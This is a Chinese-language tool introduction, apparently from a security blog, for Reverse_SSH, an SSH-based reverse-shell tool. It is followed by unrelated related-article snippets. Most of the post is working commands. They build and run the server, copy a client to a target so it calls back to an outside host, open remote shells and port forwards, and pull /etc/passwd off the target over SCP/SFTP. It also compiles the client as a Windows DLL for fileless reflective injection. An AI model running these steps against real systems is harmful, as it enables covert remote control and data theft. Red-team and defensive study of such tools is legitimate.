Reverse_SSH:一款基于SSH的反向Shell工具

一颗小胡椒2022-11-22 10:32:26

关于Reverse_SSH

Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell,并同时拥有下列功能:

1、使用原生SSH语句管理和连接反向Shell;
2、动态、本地和远程转发;
3、原生SCP和SFTP实现,用于从目标获取文件;
4、完整功能的Windows Shell;
5、实现了客户端&服务器端身份验证,以创建高信任高可用的控制通道;
6、其他...

工具架构

工具安装

Docker安装

docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh

手动安装

git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/

运行下列命令后即可启动服务器:

cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232

工具运行

将客户端拷贝到目标设备中,然后让客户端连接服务器:

./client your.rssh.server.com:3232

获取工具帮助信息:

ssh your.rssh.server.com -p 3232 help

查看客户端:

ssh your.rssh.server.com -p 3232 ls -t

连接到完整Shell:

ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac

或直接使用主机名连接:

ssh -J your.rssh.server.com:3232 root.wombo

接下来,可以开启远程转发功能:

ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo

或开启动态转发:

ssh -D 9050 -J your.rssh.server.com:3232 root.wombo

SCP:

scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

SFTP:

sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .

其他功能

默认服务器

可以在项目构建的时候指定一个默认服务器:

$ RSSH_HOMESERVER=your.rssh.server.com:3232 make
$ bin/client
$ bin/client example.com:3232

Windows DLL生成

我们还可以将客户端编译成DLL,并使用类似Invoke-ReflectivePEInjection之类的工具进行加载。此时,如果你使用的是Linux系统,可以使用mingw-w64-gcc编译器:

CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll

当RSSH服务器启用了Webserver之后,我们也可以使用下列命令进行编译:

./server --webserver :3232
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll

这种情况适用于无文件注入的场景。

Webhook

RSSH服务器可以通过命令行终端接口并使用webhook命令发送原始HTTP请求。

首先,启用一个webhook:

$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/

接下来,连接客户端,并使用下列格式发送一个POST请求:

$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
 
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%  

项目地址

Reverse_SSH:【GitHub传送门

参考资料

https://www.instagram.com/smart.hedgehog.art/
shellssh
本作品采用《CC 协议》,转载必须注明作者和本文链接
此时,如果你使用的是Linux系统,可以使用mingw-w64-gcc编译器:CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll. 当RSSH服务器启用了Webserver之后,我们也可以使用下列命令进行编译:./server --webserver :3232. 这种情况适用于无文件注入的场景。WebhookRSSH服务器可以通过命令行终端接口并使用webhook命令发送原始HTTP请求。
Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell
一个新发现的规避恶意软件利用Secure Shell加密协议进入目标系统,目的是挖掘加密货币并实施分布式拒绝服务攻击。
如果被利用,该漏洞可能允许攻击者劫持设备的摄像头和麦克风以监视房主。 安全实验室 Modux 的研究人员发现了 Enabot 的 Ebo Air 智能机器人的一个缺陷,该机器人旨在娱乐您的整个家庭和宠物。根据 Modux 研究人员的发现,攻击者可以通过利用该漏洞并监视居住者/用户来轻松入侵智能机器人。
安全研究人员观察到名为 TellYouThePass 的勒索软件家族尝试利用最近发现的 Log4j 高危漏洞。TellYouThePass 勒索软件家族被认为年代比较悠久且基本不活跃,在广泛使用的 Log4j 日志框架发现漏洞之后,该勒索软件家族再次活跃。研究人员表示,继 Khonsari 勒索软件之后,TellYouThePass 成为第二个被观察到利用 Log4j 漏洞(被称为Log4Shel
网络交换机充当网络的构建模块,促进了局域网(LAN)内的数据流。
ESXI环境搭建和配置
2022-05-09 13:32:39
ESXI环境搭建和配置
近日,负责提供安全数字化体验的智能边缘平台阿卡迈技术公司(Akamai Technologies)推出了可防范网络钓鱼的全新解决方案Akamai MFA,旨在使企业能够快速部署FIDO2多因素身份验证(MFA),而无需部署和管理硬件安全密钥。Akamai MFA使用智能手机应用程序将现有智能手机转变为硬件安全密钥,进而实现流畅的用户体验。
要说哪个网络威胁组织同时具备狡猾的社会工程学能力和灵活的网络安全技术,那就不得不提到Muddled Libra了。由于对企业信息技术有着深入的了解,即使你的组织机构拥有完善的传统网络防御系统,Muddled Libra也会对你产生巨大的威胁。
2021 年,全球因勒索软件造成的损失预计达到 200 亿美元,远高于 2015 年的 3.25 亿美元。恶意流量按照攻击行为可归纳为以下 3 种类型。攻击行为包括扫描探测、暴力破解等。相比按照恶意流量攻击行为划分,学术界更侧重于根据恶意流量的内容特征、数据流特征及网络连接行为特征等具体特征进行划分。
一颗小胡椒
暂无描述